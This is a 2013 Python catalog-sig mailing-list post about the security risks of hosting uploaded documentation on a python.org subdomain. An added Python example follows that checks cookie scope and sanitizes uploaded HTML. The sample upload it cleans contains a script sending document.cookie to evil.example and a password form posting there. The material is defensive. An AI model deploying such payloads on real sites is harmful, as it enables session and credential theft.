[Catalog-sig] Fwd: Fwd: readthedocs.org or packages.python.org?

Jesse Noller jnoller at gmail.com
Thu Feb 7 00:38:06 CET 2013



On Feb 6, 2013, at 6:32 PM, Donald Stufft <donald.stufft at gmail.com> wrote:

> On Wednesday, February 6, 2013 at 6:26 PM, martin at v.loewis.de wrote:
>>>> No, it doesn't. Cookies for "python.org" are not available to
>>>> "packages.python.org".
>>>> It would have to be a cookie for ".python.org". We don't issue such cookies.
>>> 
>>> Regards,
>>> Martin
>> 
>>> We probably will on the new site.
>> 
>> How can you know already? It would be a mistake that's easy to avoid.
>> 
> Doesn't matter either way, they are functionally equivalent.

We at the very least have to strip out JavaScript completely from uploads. And form elements; any browser things that allow local storage - the list goes on.

Even if we don't have cookies on the main site, you can hijack sessions/cookies/etc. from *.python.org via a malicious upload. This probably includes the wiki.

This doesn't even touch on the fact that the PyPI mirrors need to have proper SSL security in place, lest different hijacking occur as well.
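The two points above (cookie scope deciding what a script on packages.python.org could reach, and the need to strip active content from uploaded documentation) can be checked mechanically. The following is an added illustration, not code from python.org, PyPI or anyone in this thread: a domain-matching check in the style of RFC 6265 section 5.1.3, plus a small allowlist-style sanitizer built on the standard library's html.parser. The hostnames, cookie names and the sample upload are constructed for the example.

```python
"""Added example: cookie scope vs. subdomain-hosted uploads, and sanitizing
uploaded HTML. Not part of the original thread or of any python.org code."""
import html
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import Optional


@dataclass(frozen=True)
class Cookie:
    name: str
    host: str                     # host that set the cookie (constructed)
    domain: Optional[str] = None  # Domain= attribute, or None for a host-only cookie


def domain_matches(request_host: str, domain: str) -> bool:
    """RFC 6265 5.1.3: equal, or domain is a suffix of host across a '.' boundary.
    The leading dot of '.python.org' is ignored, as modern browsers do."""
    request_host = request_host.lower().rstrip(".")
    domain = domain.lower().lstrip(".").rstrip(".")
    return request_host == domain or request_host.endswith("." + domain)


def cookie_sent_to(cookie: Cookie, request_host: str) -> bool:
    """Would a browser attach this cookie to a request for request_host?"""
    if cookie.domain is None:
        # Host-only cookie: exact host match, so python.org cookies never
        # reach packages.python.org.
        return request_host.lower() == cookie.host.lower()
    # Any Domain attribute widens scope to every subdomain of that domain.
    return domain_matches(request_host, cookie.domain)


def reachable_cookies(cookies, upload_host: str):
    """Names of cookies that script served from upload_host could see."""
    return sorted(c.name for c in cookies if cookie_sent_to(c, upload_host))


# Elements that carry script, submit data, or embed other origins.
DANGEROUS_TAGS = {"script", "form", "input", "button", "textarea", "select",
                  "iframe", "object", "embed", "applet", "meta", "base"}
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "area", "base", "col",
             "embed", "source", "track", "wbr"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}
BAD_SCHEMES = ("javascript:", "data:", "vbscript:")


class UploadSanitizer(HTMLParser):
    """Re-emits markup, dropping dangerous elements (with their content),
    on* handlers and script-scheme URLs. Records what was removed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.removed, self.skip_depth = [], [], 0

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:                     # inside a dropped element
            self.skip_depth += tag not in VOID_TAGS
            return
        if tag in DANGEROUS_TAGS:
            self.removed.append(tag)
            self.skip_depth += tag not in VOID_TAGS
            return
        kept = []
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on"):
                self.removed.append(f"{tag}@{lname}")
                continue
            if (lname in URL_ATTRS and value is not None and
                    value.strip().lower().replace(" ", "").startswith(BAD_SCHEMES)):
                self.removed.append(f"{tag}@{lname}")
                continue
            kept.append((name, value))
        attr_text = "".join(f" {n}" if v is None else f' {n}="{html.escape(v, quote=True)}"'
                            for n, v in kept)
        self.out.append(f"<{tag}{attr_text}>")

    def handle_startendtag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:               # self-closing dangerous tag: drop
            if not self.skip_depth:
                self.removed.append(tag)
            return
        self.handle_starttag(tag, attrs)
        self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            self.skip_depth -= tag not in VOID_TAGS
            return
        if tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):             # comments can hide conditional markup; drop
        pass

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def sanitize_upload(markup: str):
    """Return (cleaned markup, list of removed elements/attributes)."""
    s = UploadSanitizer()
    s.feed(markup)
    s.close()
    return "".join(s.out), s.removed


# Constructed sample upload: documentation page carrying script, a handler,
# a form and a javascript: link.
SAMPLE_UPLOAD = (
    '<html><head><title>pkg docs</title>'
    '<script>document.location="http://evil.example/?c="+document.cookie</script></head>'
    '<body><h1 onmouseover="steal()">Usage</h1><p>Call <code>pkg.run()</code>.</p>'
    '<form action="http://evil.example/login"><input name="password"></form>'
    '<a href="javascript:alert(1)">click</a><a href="https://python.org/">home</a>'
    '</body></html>'
)

if __name__ == "__main__":
    jar = [Cookie("session", "python.org"),
           Cookie("wide_session", "python.org", domain=".python.org")]
    print("reachable from packages.python.org:", reachable_cookies(jar, "packages.python.org"))
    cleaned, removed = sanitize_upload(SAMPLE_UPLOAD)
    print(cleaned)
    print("removed:", removed)
```

The cookie half shows why the distinction in the quoted exchange matters: a host-only cookie set by python.org is never attached to a packages.python.org request, while any cookie carrying a Domain attribute is. The sanitizer half is deliberately conservative: it drops whole elements rather than trying to neutralise their contents, and reports what it removed so an upload pipeline can log or reject accordingly.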


